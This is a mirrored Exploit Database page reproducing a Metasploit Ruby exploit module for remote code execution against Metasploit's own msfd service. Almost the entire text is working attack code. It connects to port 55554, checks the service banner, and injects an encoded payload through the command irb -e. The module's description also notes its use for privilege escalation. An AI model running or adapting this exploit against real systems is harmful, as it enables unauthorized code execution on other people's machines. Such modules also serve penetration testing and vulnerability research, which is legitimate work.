Metasploit Framework – ‘msfd’ Remote Code Execution (Metasploit)

• Exploit Database
• 33 阅读

• 作者： Metasploit
  日期： 2018-05-02
• 类别：

  • remote
  平台：

  • ruby
• 来源：https://www.exploit-db.com/exploits/44570/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::Tcp
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Metasploit msfd Remote Code Execution',
  'Description'=> %q{
  Metasploit's msfd-service makes it possible to get a msfconsole-like
  interface over a TCP socket. If this socket is accessible on a remote
  interface, an attacker can execute commands on the victim's machine.
  
  If msfd is running with higher privileges than the current local user,
  this module can also be used for privilege escalation. In that case,
  port forwarding on the compromised host can be used.
  
  Code execution is achieved with the msfconsole command: irb -e 'CODE'.
  },
  'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
  'License'=> BSD_LICENSE,
  'Platform' => "ruby",
  'Arch' => ARCH_RUBY,
  'Payload'=>
  {
  'Space'=> 8192, # Arbitrary limit
  'BadChars' => "\x27\x0a",
  'DisableNops' => true
  },
  'Targets'=>
  [
  [ 'Automatic', { } ]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Apr 11 2018',# Vendor notification
  'DefaultTarget'=> 0))
  
  register_options(
  [
  Opt::RPORT(55554)
  ])
  end
  
  def check
  connect
  data = sock.get_once
  if data.include?("msf")
  disconnect
  return Exploit::CheckCode::Appears
  end
  disconnect
  return Exploit::CheckCode::Unknown
  end
  
  def exploit
  connect
  sock.get_once
  sock.put "irb -e '" + payload.encoded + "'\n"
  disconnect
  end
  end